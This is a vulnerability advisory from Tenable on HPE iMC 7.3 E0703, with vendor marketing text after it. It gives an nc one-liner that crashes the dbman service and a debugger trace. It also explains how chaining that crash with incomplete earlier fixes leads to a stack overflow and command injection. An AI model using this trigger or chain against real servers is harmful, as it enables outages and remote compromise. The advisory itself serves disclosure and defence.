Facebook Google Plus Twitter LinkedIn YouTube RSS Menu Search Resource - BlogResource - WebinarResource - ReportResource - Eventicons_066 icons_067icons_068icons_069icons_070

HPE iMC 7.3 E0703 Multiple Vulnerabilities

Critical

Synopsis

Unauthenticated Remote Denial of Service (DoS)

The flaw exists in the CDataConnStreamQueueT::deal_msg method in dbman.exe where the C++ new operator is used to allocate memory with the allocation size specified by the attacker:

.text:0045AD95      mov     eax, dword ptr [ebp+var_first4bytes]; attacker-controlled
.text:0045AD98      add     eax, 1
.text:0045AD9B      push    eax                        ; unsigned int
.text:0045AD9C      call    ??_U@YAPAXI@Z              ; operator new[](uint)

The attacker can specify a large allocation size (i.e., 0xfffffff0) by sending the following data to dbman:

echo -ne '\xff\xff\xff\x00' | nc  2810

Which could cause an exception thrown by the new operator:

0:005> g
(1b0c.1ab4): C++ EH exception - code e06d7363 (first chance)
(1b0c.1ab4): C++ EH exception - code e06d7363 (!!! second chance !!!)
eax=0257d7c8 ebx=00000021 ecx=00000003 edx=00000000 esi=7448c164 edi=00000218
eip=7629c1a2 esp=0257d7c8 ebp=0257d824 iopl=0         nv up ei pl nz ac po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000212
KERNELBASE!RaiseException+0x62:
7629c1a2 8b4c2454        mov     ecx,dword ptr [esp+54h] ss:002b:0257d81c=339b14f7
0:001> kb
 # ChildEBP RetAddr  Args to Child              
00 0257d824 7444df60 e06d7363 00000001 00000003 KERNELBASE!RaiseException+0x62
01 0257d85c 74453efd 0257d86c 7447d604 743f2a10 MSVCR90!_CxxThrowException+0x48 [f:\dd\vctools\crt_bld\self_x86\crt\prebuild\eh\throw.cpp @ 161] 
02 0257d878 0045ada1 ffffff01 45e63853 00000000 MSVCR90!operator new+0x64 [f:\dd\vctools\crt_bld\self_x86\crt\src\new.cpp @ 63] 
WARNING: Stack unwind information not available. Following frames may be wrong.
03 0257fd38 00461415 02320628 02320628 004c7144 dbman+0x5ada1
04 0257fd4c 70e7c3c9 00000218 00000054 00000000 dbman+0x61415

And the dbman process does not appear to handle the exception, resulting in process termination.

Incomplete Fixes for CVE-2019-5390 and CVE-2019-5391

The root cause of these vulnerabilities was not addressed in 7.3 E0703.

In exploitation scenarios, the attacker would first send a command 10018 (for dbman.conf variable injection) followed by a command 10000 (for dbman.conf reloading). This would be enough to trigger the stack overflow. However, with the command injection, an additional command 10002 would have to be sent to trigger a backup.

HPE iMC version 7.3 E0703 introduced changes to enforce commands 10000 and 10002 to be encrypted while allowing unencrypted command 10018. The attacker can still send a command 10018 to inject configuration variables into dbman.conf, but he/she can not send commands 10000 or 10002 without an encryption key.

However, the attacker can use the DoS vulnerability described above to kill the dbman process, forcing a restart. It's been observed that the restart happens automatically under imcsysdm.exe if the Intelligent Deployment Monitoring Agent has started (a likely production configuration). When dbman restarts with the modified dbman.conf containing a long BackHoseIp variable, stack buffer overflow occurs. Additionally, the BackupTime and BackupTimeMinute variable values can be set in the 10018 request to schedule an automated backup. This is enough to trigger the command injection.

WinDbg output:

STATUS_STACK_BUFFER_OVERRUN encountered
(990.123c): Break instruction exception - code 80000003 (first chance)
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for dbman.exe - 
eax=00000000 ebx=00000001 ecx=76275108 edx=0000002b esi=00000000 edi=00000000
eip=7631d74a esp=0019a32c ebp=0019a3b4 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
KERNELBASE!UnhandledExceptionFilter+0x5a:
7631d74a cc              int     3
0:000> kb 
 # ChildEBP RetAddr  Args to Child              
00 0019a3b4 004a9859 004cb258 721993ca 8de66c35 KERNELBASE!UnhandledExceptionFilter+0x5a
WARNING: Stack unwind information not available. Following frames may be wrong.
01 0019a6e8 0044dabb 0019a97c 0019a97c 0019a998 dbman!std::_Init_locks::operator=+0xcd1
02 0019b068 41414141 41414141 41414141 41414141 dbman+0x4dabb
03 0019b06c 41414141 41414141 41414141 41414141 0x41414141
04 0019b070 41414141 41414141 41414141 41414141 0x41414141
...

And the !exploitable WinDbg extension command shows it's exploitable:

0:000> .load msec.dll
0:000> !exploitable

!exploitable 1.6.0.0
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - Exception Handler Chain Corrupted starting at KERNELBASE!UnhandledExceptionFilter+0x000000000000005a (Hash=0xdaf335ab.0xf6a1be01)

Corruption of the exception handler chain is considered exploitable

Solution

Upgrade to iMC 7.3 E0705P02

Disclosure Timeline

06/05/2019 - Vulnerabilities discovered.
06/11/2019 - Vulnerabilities disclosed to HPE security. 90-day date is 09/09/2019.
06/14/2019 - HPE replies with an encrypted message. Tenable can't decrypt it, and sends HPE their public key.
06/18/2019 - Tenable's PGP key expired 6/17. Sends updated key to HPE.
06/21/2019 - HPE says the wrong key was used to encrypt the original disclosure. They will resend their key. Additionally, they can't import our key.
06/24/2019 - Tenable resends PGP public key and asks for HPE's key.
06/25/2019 - HPE sends a new key.
06/25/2019 - Tenable sends the original disclosure using the new key.
06/26/2019 - HPE says they sent us the wrong key. Sends another key and asks us to use that one moving forward.
06/26/2019 - Tenable acknowledges. Asks if we need to resend the report using the new key.
06/26/2019 - HPE asks to resend with new key.
06/26/2019 - Tenable resends with new key.
06/27/2019 - HPE assigns case number PSRT110957 and will let us know the action plan.
07/16/2019 - Tenable asks for an update.
07/30/2019 - Tenable asks for an update.
08/02/2019 - HPE does not have a target release date yet.
08/26/2019 - Tenable asks for an update.
09/03/2019 - As a professional courtesy, Tenable will extend the disclosure date by 2 weeks. The new disclosure date is 09/23/2019.
09/17/2019 - Tenable asks if HPE has received our communications. Reminds HPE that disclosure date is less than a week away.

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.

Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.

For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.

If you have questions or corrections about this advisory, please email [email protected]

Risk Information

Tenable Advisory ID: TRA-2019-42
CVSSv2 Base / Temporal Score:
10.0 / 9.0
CVSSv2 Vector:
(AV:N/AC:L/Au:N/C:C/I:C/A:C)
Affected Products:
HPE iMC 7.3 E0703
Risk Factor:
Critical

Advisory Timeline

09/25/2019 - Initial release
01/03/2020 - Adding link to E0705 release notes
02/21/2020 - Adding link to E0705P02 release notes. Updated solution per HPE's guidance.

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

100 assets

Choose Your Subscription Option:

Buy Now

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

100 assets

Choose Your Subscription Option:

Buy Now

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

100 assets

Choose Your Subscription Option:

Buy Now

Try Tenable Web App Scanning

Enjoy full access to our latest web application scanning offering designed for modern applications as part of the Tenable One Exposure Management platform. Safely scan your entire online portfolio for vulnerabilities with a high degree of accuracy without heavy manual effort or disruption to critical web applications. Sign up now.

Your Tenable Web App Scanning trial also includes Tenable Vulnerability Management and Tenable Lumin.

Buy Tenable Web App Scanning

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

5 FQDNs

$3,578

Buy Now

Try Tenable Lumin

Visualize and explore your exposure management, track risk reduction over time and benchmark against your peers with Tenable Lumin.

Your Tenable Lumin trial also includes Tenable Vulnerability Management and Tenable Web App Scanning.

Buy Tenable Lumin

Contact a Sales Representative to see how Tenable Lumin can help you gain insight across your entire organization and manage cyber risk.

Try Tenable Nessus Professional Free

FREE FOR 7 DAYS

Tenable Nessus is the most comprehensive vulnerability scanner on the market today.

NEW - Tenable Nessus Expert
Now Available

Nessus Expert adds even more features, including external attack surface scanning, and the ability to add domains and scan cloud infrastructure. Click here to Try Nessus Expert.

Fill out the form below to continue with a Nessus Pro Trial.

Buy Tenable Nessus Professional

Tenable Nessus is the most comprehensive vulnerability scanner on the market today. Tenable Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

Buy a multi-year license and save. Add Advanced Support for access to phone, community and chat support 24 hours a day, 365 days a year.

Select Your License

Buy a multi-year license and save.

Add Support and Training

Try Tenable Nessus Expert Free

FREE FOR 7 DAYS

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

Already have Tenable Nessus Professional?
Upgrade to Nessus Expert free for 7 days.

Buy Tenable Nessus Expert

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

Select Your License

Buy a multi-year license and save more.

Add Support and Training